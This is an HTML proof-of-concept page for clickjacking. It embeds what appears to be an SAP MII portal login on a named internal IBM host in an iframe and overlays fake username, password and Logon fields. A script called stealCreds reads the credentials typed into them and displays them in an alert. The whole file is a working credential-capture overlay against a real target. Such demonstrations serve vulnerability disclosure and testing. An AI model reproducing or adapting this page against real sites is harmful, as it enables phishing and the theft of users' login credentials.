<html>
<head>
<title>Clickjacking PoC</title>
<style>
iframe {
position: relative;
width: 1000px;
height: 750px;
z-index: 1;
}
#div_uname {
position: absolute;
top: 245px;
left: 544px;
z-index: 2;
}
#div_pwd {
position: absolute;
top: 268px;
left: 544px;
z-index: 2;
}
#div_btn {
position: absolute;
top: 310px;
left: 660px;
z-index: 2;
}
</style>
</head>
<body>
<script type="text/javascript">
function stealCreds() {
var uname = document.getElementById("username").value;
var pwd = document.getElementById("password").value;
alert("Username: " + uname + "\nPassword: " + pwd + "\n\nYou were successfully clickjacked!!");
}
</script>
<div id="div_uname">
<input type="text" id="username"> </div>
<div id="div_pwd">
<input type="password" id="password"> </div>
<div id="div_btn">
<button style="font-size: 16px" type="submit" onclick="stealCreds()">Logon</button>
</div>
<iframe src="https://sapbm37.sl1694667.sl.edst.ibm.com:50101/XMII/CM/ConnectedPlant/Portal.html" height="730" width="1250" sandbox="allow-scripts"></iframe>
</body>
</html>